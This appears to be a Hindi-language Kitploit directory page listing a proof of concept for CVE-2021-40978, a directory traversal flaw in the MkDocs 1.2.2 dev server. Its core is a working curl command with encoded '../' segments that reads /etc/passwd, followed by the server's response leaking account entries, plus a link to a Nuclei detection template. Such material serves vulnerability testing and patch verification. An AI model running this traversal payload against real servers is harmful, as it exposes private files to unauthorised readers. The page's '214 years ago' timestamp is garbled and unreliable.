Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40978 — MkDocs 1.2.2 अंतर्निहित dev-server में निर्देशिका ट्रैवर्सल के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एन्कोडेड पथ ट्रैवर्सल के माध्यम से मनमानी फ़ाइल पढ़ने में सक्षम। curl और Nuclei टेम्पलेट उदाहरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/nisdn/cve-2021-40978
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubnisdn/cve-2021-40978

CVE-2021-40978

MkDocs 1.2.2 अंतर्निहित dev-server में निर्देशिका ट्रैवर्सल के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एन्कोडेड पथ ट्रैवर्सल के माध्यम से मनमानी फ़ाइल पढ़ने में सक्षम। curl और Nuclei टेम्पलेट उदाहरण शामिल हैं।

रिपॉजिटरी देखें
214 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40978

mkdocs अंतर्निहित डेव-सर्वर डायरेक्टरी ट्रैवर्सल शोषण

Mkdocs 1.2.2 बिल्ट-इन डेव-सर्वर के माध्यम से डायरेक्टरी ट्रैवर्सल की अनुमति देता है, जो पोर्ट 8000 पर प्रतिक्रिया करता है। नीचे सफलतापूर्वक शोषित पथों के कुछ उदाहरण दिए गए हैं:

Impact

इस तकनीक का उपयोग करके रूट डायरेक्टरी के बाहर की फ़ाइलें प्राप्त करना संभव है, जिससे कोई भी व्यक्ति मनमानी फ़ाइलों को पढ़ और डाउनलोड कर सकता है।

image

अनुरोध:

image

प्रतिक्रिया:

image

अवधारणा का प्रमाण

टेम्पलेट:

Nuclei
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml
root@kitploit:~
curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...

Screenshot_20211003_231812

टूल डाउनलोड करें